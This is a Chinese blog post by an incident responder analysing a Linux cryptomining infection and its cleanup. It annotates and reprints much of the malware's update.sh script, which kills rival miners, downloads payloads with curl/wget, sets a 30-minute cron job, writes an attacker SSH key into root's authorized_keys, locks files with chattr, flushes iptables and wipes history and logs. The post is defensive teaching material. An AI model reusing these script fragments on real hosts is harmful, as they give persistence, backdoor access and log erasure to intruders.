序这是第二次遇到该挖矿病毒,网上也有很多大佬对该病毒做过分析,也想过再写可能没有什么意义,最终还是想写一写属于自己的东西,也算是两次相遇的总结。
背景这次废话不多说,直接上,背景感觉毫无意义。
分析现象确认
首先确认现象,通过查看系统进程发现存在CPU占用过高的现象,如下图:
查看进程信息:
进程关联查看,发现该病毒启动时间是在2020.09.18 10:00:01。
update.sh脚本分析
通过对程序进行分析,发现该病毒程序同路径下存在update.sh文件(/etc/update.sh),通过对该文件进行分析,发现该文件为挖矿病毒执行的脚本文件,因此对该脚本文件进行分析。
定义系统变量
关闭selinux防火墙,隐藏输出的错误信息,如果有错误信息就输出到空设备2>/dev/null空设备:
setenforce02>dev/null关闭selinux:
echo SELINUX=disabled >/etc/sysconfig/selinux2>/dev/null把内容同步写入磁盘
sync && echo3>/proc/sys/vm/drop_caches设置变量:
crondir='/var/spool/cron/'"$USER"cont=`cat${crondir}`查看ssh公钥信息
ssht=`cat /root/.ssh/authorized_keys`#ssht = cat /root/.ssh/authorized_keys关闭相关病毒程序
使用ps auxf查看所有进程,并针对kinsiing进行查找,awk是tab分割,print $2是取出第二个单词,ps auxf查看进程中第二单词为PID(这里关闭的进程较多,只列举其中一些):
ps auxf|grepkinsing| awk'{print $2}'|xargskill-9ps auxf|grepkdevtmpfsi| awk'{print $2}'|xargskill-9ps auxf|grep-vgrep|grep"mine.moneropool.com"|awk'{print $2}'|xargskill-9netstat -anp |grep185.71.65.238| awk'{print $7}'| awk -F'[/]''{print $1}'| xargs -I %kill-9%seliunx探测,检查是否关闭
if[ -f"/usr/bin/curl"]thenecho$1,$2http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code}$1`if["$http_code"-eq"200"]thencurl --connect-timeout 10 --retry 100$1>$2elif["$http_code"-eq"405"]thenelsecurl --connect-timeout 10 --retry 100$3>$2fielif[ -f"/usr/bin/cur"]thenhttp_code = `cur -I -m 10 -o /dev/null -s -w %{http_code}$1`thencur --connect-timeout 10 --retry 100$1>$2thenelsecur --connect-timeout 10 --retry 100$3>$2fielif[ -f"/usr/bin/wget"]thenwget --timeout=10 --tries=100 -O$2$1if[ $? -ne 0 ]thenwget --timeout=10 --tries=100 -O$2$3fielif[ -f"/usr/bin/wge"]thenwge --timeout=10 --tries=100 -O$2$1if[ $? -eq 0 ]thenwge --timeout=10 --tries=100 -O$2$3fifi判断是否运行相同程序的挖矿病毒,如果有则删除
ps axf -o"pid"|whilereadprocid#输出所有pid信息dols -l /proc/$procid/exe | grep /tmpif[ $? -ne 1 ]thencat /proc/$procid/cmdline| grep -a -E"sysguard|update.sh|sysupdate|networkservice"if[ $? -ne 0 ]thenkill-9$procidelseecho"don't kill"fifidoneps axf -o"pid %cpu"| awk'{if($2>=40.0) print $1}'|whilereadprocid#查找所有PID中cpu大于40的doif[ $? -ne 0 ]#$?取上一个执行命令的状态,成功返回0,错误返回其他字符 -nethenkill-9$procidelsefidone解锁操作
chattr -R -i /var/spool/cron#-R递归处理,解锁/var/spool/cron目录下的所有文件及子目录对文件进行加锁
echo"i am root"echo"goto 1" >> /etc/sysupdateschattr-i /etc/sysupdate*chattr-i /etc/config.json*chattr-i /etc/update.sh*chattr-i /root/.ssh/authorized_keys*chattr-i /etc/networkservicethenunlock_cron#调用解锁echo"*/30 * * * * sh /etc/update.sh >/dev/null 2>&1">>${crondir}lock_cron#加锁elseunlock_cron[[ $cont =~"update.sh"]]||(crontab -l ; echo"*/30 * * * * sh /etc/update.sh >/dev/null 2>&1")| crontab -lock_cron配置SSH,用于登录
chmod700/root/.ssh/echo>>/root/.ssh/authorized_keyschmod600root/.ssh/authorized_keysecho"ssh-rsa xxx root@u17">>/root/.ssh/authorized_keys#写入公钥文件依次对/etc/config.json|sysupdate|sysguard的文件大小,并对对应文件进行下载:
filesize_config=`ls -l /etc/config.json | awk'{ print $5 }'`if["$filesize_config"-ne"$config_size"]thenpkill -f sysupdaterm /etc/config.jsondownloads$config_url/etc/config.json$config_url_backupelseecho"no need download"下载update.sh
downloads$sh_url/etc/update.sh$sh_url_backup对/etc/networkservice文件大小进行比较,并下载对应文件:
if[ -f"/etc/networkservice"]#对/etc/networkservice文件大小进行比较thenfilesize2=`ls -l /etc/networkservice | awk'{ print $5 }'`if["$filesize2"-ne"$scan_size"]thenpkill -f networkservicerm /etc/networkservicedownloads$scan_url/etc/networkservice$scan_url_backupelseecho"not need download"fielse对sysupdate|networkservice|sysguard分别进行提权,并对执行的程序进行判定,是否为root执行,并再次执行,如下:
提权
if[ $? -ne 0 ]thencd/etcecho"not root runing"sleep 5s./sysupdate &elseecho"root runing....."fi再对/etc/下的病毒文件进行加锁,并对/tmp/路径下的病毒文件进行解锁,如下:、
chmod777 /etc/sysupdatechattr+i /etc/sysupdatechmod777 /etc/networkservicechattr+i /etc/networkservicechmod777 /etc/config.jsonchattr+i /etc/config.jsonchmod777 /etc/update.shchattr+i /etc/update.shchmod777 /root/.ssh/authorized_keyschattr+i /root/.ssh/authorized_keyselseecho"goto 1" > /tmp/sysupdateschattr-i /tmp/sysupdate*chattr-i /tmp/networkservicechattr-i /tmp/config.json*chattr-i /tmp/update.sh*相关解锁动作完成后会在tmp路径再次进行etc路径下的操作,操作完成后,会在此对tmp路径下的病毒文件进行加锁操作,这里不在列举,可参照上述信息。
痕迹擦除
完成上述操作后会删除已有规则,并新建相关规则,清除历史命令操作和清除相关日志信息,如下:
iptables -F#清除预设表filter中的所有规则链的规则iptables -X#清除预设表filter中使用者自定链中的规则iptables -A OUTPUT -p tcp--dport 3333 -j DROP # -A:添加到规则末尾 -p:协议 --dport:目标端口 -j:匹配规则 DROP:丢弃iptables -A OUTPUT -p tcp--dport 5555 -j DROPiptables -A OUTPUT -p tcp--dport 7777 -j DROPiptables -A OUTPUT -p tcp--dport 9999 -j DROPiptables -I INPUT -s 43.245.222.57 -jDROP#-I:添加到指定位置 INPUT:进入 -s:源端IP地址service iptables reload#重启iptablesps auxf|grep -v grep|grep"stratum"|awk'{print $2}'|xargskill-9history -c#清理历史命令echo > /var/spool/mail/rootecho > /var/log/wtmpecho > /var/log/secureecho > /root/.bash_history上述为update.sh脚本的相关操作,通过对脚本进行分析,可以发现该挖矿病毒主要依赖进程和启动项信息,借此可以对该病毒进行清理。
文件确认
/etc目录文件发现sysupdate、sguard等文件
/tmp路径未发现文件
启动项确认
通过对启动项进行查看,未发现启动项信息,如下:
病毒清理
通过上述分析,已明确相关信息,因此进行病毒清理。
通过查看进程信息,关闭所有与病毒相关进程:
删除病毒文件
无法直接删除文件:
因此需要解锁文件属性:
删除文件,并查看是否存在异常文件,通过查看,发现异常文件已清理:
系统恢复
通过删除相关文件,完成对病毒清理,系统恢复:
命令汇总明令
| 明令用途
| ps -aux
top | 查看系统进程信息
| | systemctl status [pid] | 关联信息查看 | | Ls -l /proc/pid/exe | 进程信息查看 | | crontab -r | 启动项信息查看 | | Netsata -anpt | 网络连接信息查看 | | rm -rf | 删除 |
总结该脚本分析的意义在于可以快速定位到相关文件进行处置,对应急不熟悉linux系统命令的小伙伴在对病毒清理时,不知道那些是病毒文件,那些正常文件,对此无从下手。上述我将应急过程中最实用的命令列举如上。由于在日常生活中,使用桌面操作较多,因此对命令行使用不熟悉,找不到相关文件,因此对linux系统挖矿病毒清理较为恐惧,希望通过对脚本分析这种方式对刚入门的小伙伴有所帮助。
|
发表于 2020-10-24 19:11:02
收藏